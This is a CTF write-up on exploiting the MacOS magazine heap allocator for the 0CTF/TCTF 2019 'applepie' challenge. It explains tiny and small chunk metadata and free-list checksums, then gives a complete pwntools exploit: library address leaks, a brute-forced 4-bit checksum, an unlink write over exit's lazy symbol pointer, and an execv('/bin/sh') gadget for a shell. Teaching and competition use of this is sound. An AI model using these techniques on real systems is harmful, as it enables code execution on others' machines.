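This post shares some notes I put together earlier on the MacOS heap and on ways to exploit it.
0CTF / TCTF 2019 featured a heap exploitation challenge on MacOS, and this post uses that challenge as the background for introducing heap attacks on MacOS. The first part describes the MacOS heap in detail; if you only want the exploitation, skip ahead to the sections on writing the applepie exp.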
Original post: https://gloxec.github.io
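Introduction to the MacOS heap
Recent versions of MacOS use the Magazine Allocator for heap allocation, while older versions use the Scalable Allocator. The detailed structures are not covered here. At allocation time, requests are divided by size into three classes: tiny, small and large.
Tiny and small allocations are managed in a unit called a **Quantum (Q)**: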
- tiny (Q = 16) ( tiny < 1009B )
- small (Q = 512) ( 1008B < small < 127KB )
- large ( 127KB < large )
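The size classes above can be sketched as a small lookup. This is only an illustration of the thresholds listed here, not libmalloc's code: the names `classify`, `TINY_MAX` and `SMALL_MAX` are made up for the example, and treating exactly 127KB as small is an assumption, since the list leaves that boundary open.

```python
TINY_QUANTUM = 16           # Q for tiny chunks
SMALL_QUANTUM = 512         # Q for small chunks
TINY_MAX = 1008             # tiny < 1009 B
SMALL_MAX = 127 * 1024      # assumption: exactly 127 KB still counts as small


def classify(size):
    """Return (size class, size in quanta) for a request of `size` bytes."""
    if size <= TINY_MAX:
        name, quantum = "tiny", TINY_QUANTUM
    elif size <= SMALL_MAX:
        name, quantum = "small", SMALL_QUANTUM
    else:
        # large allocations are not measured in quanta
        return ("large", None)
    # round up to a whole number of quanta, with a minimum of one
    quanta = max(1, -(-size // quantum))
    return (name, quanta)
```

For instance, the 0x40-byte names used later in the exp fall into the tiny class and occupy 4 Q.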
Each magazine has a cache area that is used to allocate and free chunks quickly.
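Heap metadata
The MacOS allocator differs from other systems in that it does not use a linked-list layout: chunks do not carry heap metadata before or after them. The metadata is stored elsewhere, and several measures are taken to prevent a heap overflow from modifying it.
Each process has three areas: the tiny rack, the small rack and the large allocations.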
tiny rack | small rack | large allocations |
---|---|---|
magazine | magazine | |
magazine | magazine | |
magazine | magazine | |
… | … | |
magazine | magazine | |
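Each rack contains several magazines, and the set of active magazines can change.
Each magazine contains a number of "Regions".
The size of a "Region" differs between the tiny rack and the small rack: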
“Region” in Tiny rack = 1MB
“Region” in Small rack = 8MB
tiny rack{
magazine 1 {
Region 1 {}
Region 2 {}
...
Region n {}
}
magazine 2 {}
...
magazine n {}
}
small rack{
...
magazine n {}
...
}
A "Region" contains three things: memory blocks measured in units of Q, a trailer that links the "Regions" together, and metadata that records information about each chunk.
tiny Region {
Q(1Q = 16) * 64520 blocks
region_trailer_t trailer
metadata[64520/sizeof(uint32_t)] {
bitmaps[0]: uint32_t header = marks which blocks are the first block of a chunk
bitmaps[1]: uint32_t inuse = records the chunk state (busy/free)
}
}
Small Region {
Q(1Q = 512) * 16320 blocks
region_trailer_t trailer
metadata[16320] {
bitmaps[0]: uint16_t msize = the top bit records the chunk state (busy/free); the remaining bits hold the chunk's size in Q (that is, how many Q separate it from the next chunk)
}
}
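To make the small-region metadata more concrete, here is a minimal sketch of decoding one msize entry and hopping from chunk to chunk. It assumes that a set top bit means "free" (the text only says the top bit carries the busy/free state), and `decode_small_msize` and `walk_small_metadata` are names invented for this example.

```python
SMALL_QUANTUM = 512
SMALL_IS_FREE = 0x8000      # assumption: a set top bit means the chunk is free


def decode_small_msize(entry):
    """Split one uint16_t msize entry into (is_free, quanta, bytes)."""
    is_free = bool(entry & SMALL_IS_FREE)
    quanta = entry & 0x7FFF
    return is_free, quanta, quanta * SMALL_QUANTUM


def walk_small_metadata(metadata):
    """Yield (block index, is_free, quanta) for each chunk in a region.

    Only the entry of the first block of a chunk is meaningful; its Q value
    tells us how many blocks to skip to reach the next chunk.
    """
    index = 0
    while index < len(metadata):
        is_free, quanta, _ = decode_small_msize(metadata[index])
        if quanta == 0:
            break           # untouched tail of the region
        yield index, is_free, quanta
        index += quanta
```

With `metadata = [2, 0, 0x8003, 0, 0, 1]` the walk visits a busy 2 Q chunk, a free 3 Q chunk and a busy 1 Q chunk.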
Large allocations are kept in a cache that records their address and size directly. Unless fragmentation is severe, they are generally not unmapped.
large {
address
size
did_madvise_reusable
}
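Freeing a chunk - changes to the chunk itself
Tiny chunks:
When a tiny chunk is freed, it is linked onto the freelist, much as on Linux.
The interesting point is that freeing a tiny chunk writes metadata into the chunk itself, and this is the part we care about: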
# -----------------------------------------------
# AAAAA....
#
# ...AAA...
# .....AAAA
# -----------------------------------------------
# |
# | after free
# |
# ↓
# -----------------------------------------------
# checksum(prev_pointer) | checksum(next_pointer)
# size | ...
# ...
# | size
# -----------------------------------------------
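The two pointers here closely resemble the header of a free chunk on Linux, and they serve the same purpose: they drive the linked-list operations when a chunk is taken from the freelist, and when a chunk is freed the allocator checks whether it can be coalesced and uses these two pointers for the unlink operation.
However, attacking the heap the way one would on Linux does not work here, because the checksum stops an overflow from modifying the heap metadata undetected. The checksum is outlined later.
One more point to note when freeing tiny chunks: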
a1 = malloc(496)
a2 = malloc(496)
a3 = malloc(496)
free(a1)
free(a3)
# at this point the prev_pointer and next_pointer of a1 and a3 are linked together correctly
free(a2)
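# once a2 is freed as well, the headers of a2 and a3 are cleared, while the size in a1's header becomes the sum of all three and the chunk is moved to the small heap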
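The coalescing behaviour in this experiment can be modelled with a toy heap. This is a simplified sketch, not libmalloc's logic: chunks are just `[size, is_free]` pairs in address order, and `free_and_coalesce` is a hypothetical helper that merges a freed chunk with free neighbours.

```python
def free_and_coalesce(chunks, index):
    """Mark chunks[index] free and merge it with adjacent free chunks.

    `chunks` is a list of [size, is_free] pairs in address order.
    """
    chunks[index][1] = True
    # merge with the following chunk if it is free
    if index + 1 < len(chunks) and chunks[index + 1][1]:
        chunks[index][0] += chunks[index + 1][0]
        del chunks[index + 1]
    # merge with the preceding chunk if it is free
    if index > 0 and chunks[index - 1][1]:
        chunks[index - 1][0] += chunks[index][0]
        del chunks[index]
    return chunks


heap = [[496, False], [496, False], [496, False]]   # a1, a2, a3
free_and_coalesce(heap, 0)   # free(a1)
free_and_coalesce(heap, 2)   # free(a3)
free_and_coalesce(heap, 1)   # free(a2): all three merge into one chunk
```

After the last call the toy heap holds a single free chunk of 3 * 496 = 1488 bytes, which is above the tiny limit of 1008 bytes and is at least consistent with the merged chunk ending up outside the tiny freelists.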
Small chunks:
Unlike a tiny chunk, a freed small chunk is first moved to the cache; only when the next small chunk is freed is the cached one moved to the freelist.
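Freeing a chunk - changes to the chunk metadata
mag_free_list
This is the freelist mentioned above. mag_free_list is a list of addresses with 32 entries, each holding the address of the freed chunks of the corresponding Q value. The first 31 entries are the freelists for chunks of 1Q to 31Q, and the 32nd holds the freelist for chunks larger than 31Q.
When a chunk is freed, it is placed on the freelist that matches its size in Q, and checksum(prev_pointer) and checksum(next_pointer) are set up as in a doubly linked list (compare the Linux freelist).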
mag_free_bit_map
As the name suggests, this is a bitmap that marks, one bit per Q(n), whether that size has a freelist.
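The relationship between mag_free_list and mag_free_bit_map can be sketched as follows. The `FreeLists` class is a made-up model that follows the 32-slot description above. Inserting at the head of a list is an assumption, chosen because the exp later relies on the most recently freed chunk being handed out first.

```python
NUM_SLOTS = 32  # 1Q..31Q each get a slot, slot 32 holds everything larger


class FreeLists:
    def __init__(self):
        self.mag_free_list = [[] for _ in range(NUM_SLOTS)]
        self.mag_free_bit_map = 0

    @staticmethod
    def slot_for(quanta):
        """Slot index for a chunk of `quanta` Q (0-based)."""
        return min(quanta, NUM_SLOTS) - 1

    def add(self, addr, quanta):
        slot = self.slot_for(quanta)
        self.mag_free_list[slot].insert(0, addr)    # assumption: head insert
        self.mag_free_bit_map |= 1 << slot          # mark slot as non-empty

    def pop(self, quanta):
        slot = self.slot_for(quanta)
        if not (self.mag_free_bit_map >> slot) & 1:
            return None                             # nothing of this size
        addr = self.mag_free_list[slot].pop(0)
        if not self.mag_free_list[slot]:
            self.mag_free_bit_map &= ~(1 << slot)   # slot became empty
        return addr
```

The bitmap lets the allocator test for an available size with one bit check instead of inspecting every list.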
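Freeing a chunk - checksum
A random cookie is generated each time the program runs. The cookie is combined with the pointer in the calculation below to produce a checksum, and the value stored in the chunk is (checksum << ANTI_NYBBLE) | (pointer >> NYBBLE), so the checksum sits in the high bits and can be used to detect whether the heap metadata has been corrupted by an overflow.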
static MALLOC_INLINE uintptr_t
free_list_checksum_ptr(rack_t *rack, void *ptr)
{
uintptr_t p = (uintptr_t)ptr;
return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction
}
static MALLOC_INLINE void *
free_list_unchecksum_ptr(rack_t *rack, inplace_union *ptr)
{
inplace_union p;
uintptr_t t = ptr->u;
t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
p.u = t & ~(uintptr_t)0xF;
if ((t ^ free_list_gen_checksum(p.u ^ rack->cookie)) & (uintptr_t)0xF) {
free_list_checksum_botch(rack, ptr, (void *)ptr->u);
__builtin_trap();
}
return p.p;
}
static MALLOC_INLINE uintptr_t
free_list_gen_checksum(uintptr_t ptr)
{
uint8_t chk;
chk = (unsigned char)(ptr >> 0);
chk += (unsigned char)(ptr >> 8);
chk += (unsigned char)(ptr >> 16);
chk += (unsigned char)(ptr >> 24);
#if __LP64__
chk += (unsigned char)(ptr >> 32);
chk += (unsigned char)(ptr >> 40);
chk += (unsigned char)(ptr >> 48);
chk += (unsigned char)(ptr >> 56);
#endif
return chk;
}
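For experimenting outside a debugger, the three functions above can be ported to Python. The port below is a sketch that takes the cookie directly instead of a rack_t, raises an exception where the C code traps, and assumes the 64-bit values NYBBLE = 4 and ANTI_NYBBLE = 60.

```python
MASK64 = (1 << 64) - 1
NYBBLE = 4                   # assumption: 64-bit build
ANTI_NYBBLE = 64 - NYBBLE


def free_list_gen_checksum(ptr):
    """Sum of the eight bytes of ptr, truncated to one byte."""
    return sum((ptr >> shift) & 0xFF for shift in range(0, 64, 8)) & 0xFF


def free_list_checksum_ptr(cookie, ptr):
    """Encode a 16-byte aligned pointer the way it is stored in a free chunk."""
    chk = free_list_gen_checksum(ptr ^ cookie) & 0xF
    return ((ptr >> NYBBLE) | (chk << ANTI_NYBBLE)) & MASK64


def free_list_unchecksum_ptr(cookie, stored):
    """Decode a stored value, raising if the 4-bit checksum does not match."""
    t = ((stored << NYBBLE) | (stored >> ANTI_NYBBLE)) & MASK64   # rotate left 4
    ptr = t & ~0xF & MASK64
    if (t ^ free_list_gen_checksum(ptr ^ cookie)) & 0xF:
        raise ValueError("free list checksum mismatch")
    return ptr
```

Encoding and then decoding with the same cookie returns the original pointer, while changing the stored checksum bits makes the decode fail.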
magazine_t
This structure contains the data described above: the chunk cache, mag_free_bit_map, mag_free_list, the most recently used region, and the linked list of all regions.
struct magazine_t {
...
void *mag_last_free;
unsigned[8] mag_bitmap;
free_list_t*[256] mag_free_list;
region_t mag_last_region;
region_trailer_t *firstNode, *lastNode;
...
}
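Allocating a chunk
An allocation first looks for a matching chunk in the cache. If none is found it searches the freelist, and if that also fails the chunk is carved out of a region.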
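The lookup order can be written down as a toy function. Everything here is a simplification for illustration: the magazine is a plain dict, the cache holds at most one `(address, quanta)` pair that must match the request exactly, and `allocate` is a hypothetical name rather than a libmalloc function.

```python
TINY_QUANTUM = 16


def allocate(mag, quanta):
    """Return (address, source) following the cache -> freelist -> region order."""
    # 1. cache: the most recently freed chunk, if the size matches
    cached = mag["last_free"]
    if cached is not None and cached[1] == quanta:
        mag["last_free"] = None
        return cached[0], "cache"
    # 2. freelist for this size
    bucket = mag["free_list"].get(quanta)
    if bucket:
        return bucket.pop(0), "freelist"
    # 3. fresh memory from the region
    addr = mag["region_next"]
    mag["region_next"] += quanta * TINY_QUANTUM
    return addr, "region"


mag = {"last_free": (0x1000, 4), "free_list": {4: [0x2000]}, "region_next": 0x3000}
first = allocate(mag, 4)
second = allocate(mag, 4)
third = allocate(mag, 4)
```

Three consecutive 4 Q requests are served from the cache, then the freelist, then the region. For exploitation this matters because the target chunk has to come from the freelist.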
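Attack approach for the challenge
The challenge binary has all protections enabled, including PIE. Next, the program flow.
The whole program operates on heap data through the following structure.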
struct mem {
    int StyleTableIndex;
    int ShapeTableIndex;
    int Time;
    int NameSize;
    char *NameMem;
};
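- Overflow
When update() updates a mem, mem->NameSize can be set to an arbitrary value, so writing the name can overflow into the next mem that follows the name buffer.
The new size is limited, however, so the overflow can reach at most the first three fields of the next mem structure: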
mem->StyleTableIndex
mem->ShapeTableIndex
mem->Time
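- Leak
show() can be used to leak data through StyleTable[offset/8].
Because of PIE, the heap and stack addresses are randomised on every run, so the overall plan is to leak the address of libsystem_c.dylib first, and then use the heap bug to write the address of the execv('/bin/sh') code it contains to a location that lets us hijack control flow.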
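The StyleTable[offset/8] leak depends on choosing an index that lands on the wanted address, including addresses below the table. The sketch below shows the index arithmetic used for the two offsets that appear in the exp (0x3fc0 and 0xffffffffffffff78). It assumes the program computes the read address as table base + 8 * index with 64-bit wraparound, and both helper names are invented for the example.

```python
MASK64 = (1 << 64) - 1


def style_index_for(offset):
    """Index whose entry lies `offset` bytes from StyleTable (offset may be negative)."""
    assert offset % 8 == 0, "entries are 8-byte pointers"
    return (offset & MASK64) // 8


def effective_offset(index):
    """Signed byte offset actually reached by StyleTable[index]."""
    off = (index * 8) & MASK64
    return off - (1 << 64) if off >> 63 else off
```

A negative offset such as -0x88 becomes the index 0xffffffffffffff78 // 8, and multiplying it by 8 wraps back to -0x88, so entries located before the table are reachable too.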
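Leaking libsystem_c.dylib through MacOS heap features
Looking at the vmmap of the running program, there is a Malloc metadata region below the program image, and the DefaultZone is stored at the start of it.
Let's look at the libmalloc source code: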
typedef struct _malloc_zone_t {
/* Only zone implementors should depend on the layout of this structure;
Regular callers should use the access functions below */
void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */
void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */
size_t (* MALLOC_ZONE_FN_PTR(size))(struct _malloc_zone_t *zone, const void *ptr); /* returns the size of a block or 0 if not in this zone; must be fast, especially for negative answers */
void *(* MALLOC_ZONE_FN_PTR(malloc))(struct _malloc_zone_t *zone, size_t size);
void *(* MALLOC_ZONE_FN_PTR(calloc))(struct _malloc_zone_t *zone, size_t num_items, size_t size); /* same as malloc, but block returned is set to zero */
void *(* MALLOC_ZONE_FN_PTR(valloc))(struct _malloc_zone_t *zone, size_t size); /* same as malloc, but block returned is set to zero and is guaranteed to be page aligned */
void (* MALLOC_ZONE_FN_PTR(free))(struct _malloc_zone_t *zone, void *ptr);
void *(* MALLOC_ZONE_FN_PTR(realloc))(struct _malloc_zone_t *zone, void *ptr, size_t size);
void (* MALLOC_ZONE_FN_PTR(destroy))(struct _malloc_zone_t *zone); /* zone is destroyed and all memory reclaimed */
const char *zone_name;
/* Optional batch callbacks; these may be NULL */
unsigned (* MALLOC_ZONE_FN_PTR(batch_malloc))(struct _malloc_zone_t *zone, size_t size, void **results, unsigned num_requested); /* given a size, returns pointers capable of holding that size; returns the number of pointers allocated (maybe 0 or less than num_requested) */
void (* MALLOC_ZONE_FN_PTR(batch_free))(struct _malloc_zone_t *zone, void **to_be_freed, unsigned num_to_be_freed); /* frees all the pointers in to_be_freed; note that to_be_freed may be overwritten during the process */
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
unsigned version;
/* aligned memory allocation. The callback may be NULL. Present in version >= 5. */
void *(* MALLOC_ZONE_FN_PTR(memalign))(struct _malloc_zone_t *zone, size_t alignment, size_t size);
/* free a pointer known to be in zone and known to have the given size. The callback may be NULL. Present in version >= 6.*/
void (* MALLOC_ZONE_FN_PTR(free_definite_size))(struct _malloc_zone_t *zone, void *ptr, size_t size);
/* Empty out caches in the face of memory pressure. The callback may be NULL. Present in version >= 8. */
size_t (* MALLOC_ZONE_FN_PTR(pressure_relief))(struct _malloc_zone_t *zone, size_t goal);
/*
* Checks whether an address might belong to the zone. May be NULL. Present in version >= 10.
* False positives are allowed (e.g. the pointer was freed, or it's in zone space that has
* not yet been allocated. False negatives are not allowed.
*/
boolean_t (* MALLOC_ZONE_FN_PTR(claimed_address))(struct _malloc_zone_t *zone, void *ptr);
} malloc_zone_t;
The member that deserves a closer look is:
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
Continuing through the source:
typedef struct malloc_introspection_t {
kern_return_t (* MALLOC_INTROSPECT_FN_PTR(enumerator))(task_t task, void *, unsigned type_mask, vm_address_t zone_address, memory_reader_t reader, vm_range_recorder_t recorder); /* enumerates all the malloc pointers in use */
size_t (* MALLOC_INTROSPECT_FN_PTR(good_size))(malloc_zone_t *zone, size_t size);
...
}
From the heap material covered earlier, we know that DefaultZone->introspect->enumerator stores the address of the function that implements enumerator, szone_ptr_in_use_enumerator.
Address of libsystem_malloc.dylib
Therefore:
libsystem_malloc.dylib address = leaked szone_ptr_in_use_enumerator address - offset of szone_ptr_in_use_enumerator (0x0000000000013D68)
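Address of libsystem_c.dylib
There is an interesting detail here: PIE on MacOS randomises the heap, stack and load address of the program on every run, but the addresses of the dynamic libraries it pulls in do not change; they appear to change only at boot.
So we can look at vmmap, note the load addresses of libsystem_c.dylib and libsystem_malloc.dylib, and obtain the offset between them.
libsystem_c.dylib = libsystem_malloc.dylib - offset (0x161000)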
OneGadget RCE
Analysing libsystem_c.dylib turns up an execv('/bin/sh') code snippet, just like the one found in the Linux libc.
onegadget rce = libsystem_c.dylib + 0x0000000000025D94
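The address arithmetic so far can be collected into one helper. The offsets are the ones quoted in this post and are specific to the author's system and library versions. `compute_addresses` is a hypothetical name, and the sample leak is the szone_ptr_in_use_enumerator address shown in the exp comments.

```python
ENUMERATOR_OFFSET = 0x13D68     # szone_ptr_in_use_enumerator in libsystem_malloc.dylib
MALLOC_TO_LIBC = 0x161000       # libsystem_malloc.dylib base - libsystem_c.dylib base
ONEGADGET_OFFSET = 0x25D94      # execv('/bin/sh') snippet in libsystem_c.dylib


def compute_addresses(leaked_enumerator):
    """Derive the library bases and the gadget address from one leaked pointer."""
    malloc_base = leaked_enumerator - ENUMERATOR_OFFSET
    libc_base = malloc_base - MALLOC_TO_LIBC
    return {
        "libsystem_malloc": malloc_base,
        "libsystem_c": libc_base,
        "onegadget_rce": libc_base + ONEGADGET_OFFSET,
    }


addrs = compute_addresses(0x7FFF68161D68)
```

On a different MacOS build all three constants would have to be measured again with vmmap and a disassembler.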
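Hijacking control flow - preparation
Here we use the Mach-O lazy binding mechanism and overwrite a function address stored in the la_symbol_ptr table of libsystem_c.dylib (the table of the challenge binary itself is not used because its load address cannot be leaked).
After looking through the candidates, the best choice turned out to be exit_la_symbol_ptr.
Entering an invalid Size in add() makes the program call exit(), which then executes the address we wrote.
The TEXT and DATA regions of libsystem_c.dylib are far apart, unlike in the challenge binary where they sit next to each other, so one more leak is needed for the address of the DATA region of libsystem_c.dylib.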
libsystem_c.dylib DATA
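Analysing the challenge binary shows a FILE **__stdinp_ptr in its .got.
The leading _p field points into a block of memory, which can be used to leak the DATA address. The offset between this buffer and the start of DATA can be worked out by inspection: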
libsystem_c_DATA = libsystem_c_stdinptr - 0x4110
typedef struct __sFILE {
unsigned char *_p; /* current position in (some) buffer */
int _r; /* read space left for getc() */
int _w; /* write space left for putc() */
short _flags; /* flags, below; this FILE is free if 0 */
short _file; /* fileno, if Unix descriptor, else -1 */
struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */
int _lbfsize; /* 0 or -_bf._size, for inline putc */
/* operations */
void *_cookie; /* cookie passed to io functions */
int (*_close)(void *);
int (*_read) (void *, char *, int);
fpos_t (*_seek) (void *, fpos_t, int);
int (*_write)(void *, const char *, int);
/* separate buffer for long sequences of ungetc() */
struct __sbuf _ub; /* ungetc buffer */
struct __sFILEX *_extra; /* additions to FILE to not break ABI */
int _ur; /* saved _r when _r is counting ungetc data */
/* tricks to meet minimum requirements even when malloc() fails */
unsigned char _ubuf[3]; /* guarantee an ungetc() buffer */
unsigned char _nbuf[1]; /* guarantee a getc() buffer */
/* separate buffer for fgetln() when line crosses buffer boundary */
struct __sbuf _lb; /* buffer for fgetln() */
/* Unix stdio files get aligned to block boundaries on fseek() */
int _blksize; /* stat.st_blksize (may be != _bf._size) */
fpos_t _offset; /* current lseek offset (see WARNING) */
} FILE;
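Hijacking control flow - core
Following the allocation path described earlier, we can arrange some tiny chunks so that the next allocation is served from the freelist and goes through tiny_malloc_from_free_list(), whose internal unlink performs next->previous = ptr->previous, giving a write of arbitrary data to an arbitrary address.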
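The write primitive hidden in that unlink can be modelled in a few lines. This is a sketch under several assumptions: memory is a dict of 64-bit words, previous sits at offset 0 and next at offset 8 of a free chunk (as in the diagram earlier), ANTI_NYBBLE is 60, and only the single assignment next->previous = ptr->previous is modelled. The function names and the sample addresses are illustrative.

```python
MASK64 = (1 << 64) - 1


def gen_checksum(value):
    return sum((value >> s) & 0xFF for s in range(0, 64, 8)) & 0xFF


def checksum_ptr(cookie, ptr):
    return ((ptr >> 4) | ((gen_checksum(ptr ^ cookie) & 0xF) << 60)) & MASK64


def unchecksum_ptr(cookie, stored):
    t = ((stored << 4) | (stored >> 60)) & MASK64
    ptr = t & ~0xF & MASK64
    if (t ^ gen_checksum(ptr ^ cookie)) & 0xF:
        raise ValueError("free list checksum mismatch")
    return ptr


def unlink_from_free_list(memory, cookie, ptr):
    """Model the write done when `ptr` is removed from the head of a freelist."""
    next_chunk = unchecksum_ptr(cookie, memory[ptr + 8])
    if next_chunk:
        # next->previous = ptr->previous: the raw previous field is copied
        memory[next_chunk] = memory[ptr]
    return ptr


cookie = 0x1122334455667788          # unknown to a real attacker
chunk = 0x00007FAB00001000           # freed chunk whose header we overflowed
target = 0x00007FFF900000B0          # where we want to write
payload = 0x00007FFF68012D94         # what we want to write
memory = {chunk: payload, chunk + 8: checksum_ptr(cookie, target)}
unlink_from_free_list(memory, cookie, chunk)
```

Here the forged next field is built with the real cookie, so the check passes and `payload` lands at `target`. In the actual attack the cookie is unknown, which is the obstacle discussed next.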
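There is a problem, though: before the unlink there is an unchecksum check, and because a random cookie is generated for the current zone on every run, the check cannot simply be bypassed.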
next = free_list_unchecksum_ptr(rack, &ptr->next);
free_list_gen_checksum(uintptr_t ptr)
{
uint8_t chk;
chk = (unsigned char)(ptr >> 0);
chk += (unsigned char)(ptr >> 8);
chk += (unsigned char)(ptr >> 16);
chk += (unsigned char)(ptr >> 24);
#if __LP64__
chk += (unsigned char)(ptr >> 32);
chk += (unsigned char)(ptr >> 40);
chk += (unsigned char)(ptr >> 48);
chk += (unsigned char)(ptr >> 56);
#endif
return chk;
}
static MALLOC_INLINE uintptr_t free_list_checksum_ptr(rack_t *rack, void *ptr)
{
uintptr_t p = (uintptr_t)ptr;
return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction
}
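Fortunately, after computing the checksum over the cookie and the pointer, MacOS keeps only 4 significant bits of it. We can therefore pick a fixed checksum and brute-force: rerun the exploit until the cookie generated by the program happens to give our pointer exactly the checksum we chose.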
value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16)))
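A rough estimate of how well this brute force works can be obtained from the checksum code shown above. The sketch assumes ANTI_NYBBLE = 60, models the forged value after that C code, and assumes the 4-bit checksum is uniformly distributed over runs. `forge_next`, `passes_check` and `success_probability` are names made up for the example.

```python
MASK64 = (1 << 64) - 1


def gen_checksum(value):
    return sum((value >> s) & 0xFF for s in range(0, 64, 8)) & 0xFF


def forge_next(target, guessed_nibble):
    """Stored form of `target` carrying a guessed 4-bit checksum."""
    return ((target >> 4) | (guessed_nibble << 60)) & MASK64


def passes_check(cookie, stored):
    """True if free_list_unchecksum_ptr would accept `stored` under `cookie`."""
    t = ((stored << 4) | (stored >> 60)) & MASK64
    ptr = t & ~0xF & MASK64
    return ((t ^ gen_checksum(ptr ^ cookie)) & 0xF) == 0


def success_probability(attempts):
    """Chance that at least one of `attempts` runs hits the guessed checksum."""
    return 1 - (15 / 16) ** attempts


target = 0x00007FFF900000B0
forged = forge_next(target, 0x2)
hits = sum(passes_check(cookie, forged) for cookie in range(16))
```

Among 16 cookies that differ only in their low nibble exactly one accepts the forged value, so each run succeeds with probability about 1/16 under the uniformity assumption, and a loop of 0x23 attempts like the one in the exp succeeds roughly 90% of the time.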
Getting a shell
The complete exp follows:
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
#import monkeyhex
from binascii import *
import socket
import sys


def main(checksum, localFlag):
    if localFlag == 1:
        p = process('./applepie')
    elif localFlag == 2:
        p = remote('127.0.0.1', 10007)
    elif localFlag == 3:
        p = remote('111.186.63.147', 6666)
    # context.log_level = 'debug'
    context.terminal = ['tmux', 'split', '-h']

    def add(style, shape, size, name):
        p.recvuntil('Choice: ')
        p.sendline('1')
        p.recvuntil(':')
        p.sendline(str(style))
        p.recvuntil(':')
        p.sendline(str(shape))
        p.recvuntil(':')
        p.sendline(str(size))
        p.recvuntil(':')
        p.sendline(name)

    def show(id):
        p.recvuntil('Choice:')
        p.sendline('2')
        p.recvuntil(':')
        p.sendline(str(id))

    def update(id, style, shape, size, name):
        p.recvuntil('Choice: ')
        p.sendline('3')
        p.recvuntil(':')
        p.sendline(str(id))
        p.recvuntil(':')
        p.sendline(str(style))
        p.recvuntil(':')
        p.sendline(str(shape))
        p.recvuntil('Size: ')
        p.sendline(str(size))
        p.recvuntil(':')
        p.sendline(name)

    def free(id):
        p.recvuntil('Choice:')
        p.sendline('4')
        p.recvuntil(':')
        p.sendline(str(id))

    id0 = add(1, 1, 0x40, 'aaa')
    id1 = add(1, 1, 0x40, 'aaa')
    # Overflow into the StyleTable index of the next mem to leak the enumerator pointer
    # stored in the introspect member of the Default Zone struct; this leaks libsystem_malloc.dylib
    # libsystem_malloc.dylib`szone_ptr_in_use_enumerator:
    # 0x7fff68161d68 <+0>: push rbp
    # 0x7fff68161d69 <+1>: mov rbp, rsp
    update(0, 1, 1, 0x50, 'a'*0x40 + p64(0x3fc0/8))
    show(1)
    p.recvuntil('Style: ')
    szone_ptr_in_use_enumerator = u64(p.recvuntil('\n')[:-1].ljust(8, '\x00'))
    log.info_once('szone_ptr_in_use_enumerator = ' + hex(szone_ptr_in_use_enumerator))
    # offset of szone_ptr_in_use_enumerator inside libsystem_malloc.dylib: 0x0000000000013D68
    libsystem_malloc_baseImage = szone_ptr_in_use_enumerator - 0x0000000000013D68
    # Quirk of PIE on Mac: the program itself is fully randomised on every run, but the
    # dynamic libraries are randomised only once at boot and stay fixed afterwards
    libsystem_c_baseImage = libsystem_malloc_baseImage - 0x161000
    onegadget_rce = libsystem_c_baseImage + 0x0000000000025D94
    # libsystem_c_exit_la_symbol_ptr = libsystem_c_baseImage + 0x8a0b0
    log.info_once('libsystem_malloc.dylib = ' + hex(libsystem_malloc_baseImage))
    log.info_once('libsystem_c.dylib = ' + hex(libsystem_c_baseImage))
    log.info_once('libsystem_c.dylib: onegadget rce = ' + hex(onegadget_rce))
    # log.info('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr))

    # The DATA and TEXT segments of libsystem_c.dylib and other dylibs are far apart (see vmmap),
    # so leak the DATA segment of libsystem_c.dylib first
    update(0, 1, 1, 0x50, 'a'*0x40 + p64(0xffffffffffffff78/8))
    show(1)
    p.recvuntil('Style: ')
    libsystem_c_stdinptr = u64(p.recvuntil('\n')[:-1].ljust(8, '\x00'))
    log.info_once('FILE *stdinp->p: ' + hex(libsystem_c_stdinptr))
    libsystem_c_DATA = libsystem_c_stdinptr - 0x4110
    log.info_once('libsystem_c.dylib: DATA seg = ' + hex(libsystem_c_DATA))
    libsystem_c_exit_la_symbol_ptr = libsystem_c_DATA + 0xb0
    log.info_once('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr))

    # Next steps:
    id2 = add(1, 1, 0x40, 'aaa')
    id3 = add(1, 1, 0x40, 'aaa')  # free
    id4 = add(1, 1, 0x40, 'aaa')  # -----> update this chunk to overflow into the next free chunk, id5
    id5 = add(1, 1, 0x40, 'aaa')  # free
    id6 = add(1, 1, 0x40, 'aaa')
    id7 = add(1, 1, 0x40, 'aaa')  # free
    id8 = add(1, 1, 0x40, 'aaa')
    # Free id3, id5 and id7 so that they are linked onto the freelist
    free(3)
    free(5)
    free(7)
    # Updating chunk id4 overflows into the metadata header of the freed chunk id5
    # -----------------------------
    # prev_pointer | next_pointer
    # size         | ...
    # ...
    #              | size
    # -----------------------------
    #
    # The next malloc then takes the previously freed id7 from the freelist,
    # and one more malloc returns id5
    value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16)))
    log.info_once('after checksum(ptr): ' + hex(u64(value)))
    id7 = add(1, 1, 0x40, 'aaa')
    update(4, 1, 1, 0x50, 'a'*0x40 + p64(onegadget_rce) + value)
    # malloc triggers the unlink, which writes onegadget_rce to libsystem_c_exit_la_symbol_ptr
    p.recvuntil('Choice: ')
    p.recvuntil('Choice: ')
    p.sendline('1')  # add id 5
    try:
        res = p.recv()  # receive 'Error'
        if res.find('malloc') > 0:
            log.failure('error checksum: ' + res)
            return
        else:
            log.success('!!! correct checksum(' + hex(libsystem_c_exit_la_symbol_ptr) + '): ' + hex(u64(value)))
            p.sendline('1')  # Style
            p.recvuntil('Choice: ')
            p.sendline('1')  # Shape
            p.recvuntil('Size: ')
            p.sendline('9999')  # an invalid Size makes the program take the exit() path
            p.recv()  # 'Error'
            p.sendline('uname')
            res = p.recvuntil('Darwin')
            log.info(res)
    except:
        return
    p.interactive()  # once we have a shell we can stop here
    if res.find('Darwin') >= 0:
        sys.exit()


# Retry with the same fixed checksum guess until the random cookie happens to match
for i in range(0x00, 0x23):
    checksum = '0x'+'{:016x}'.format(0x23<<56)
    main(checksum, 1)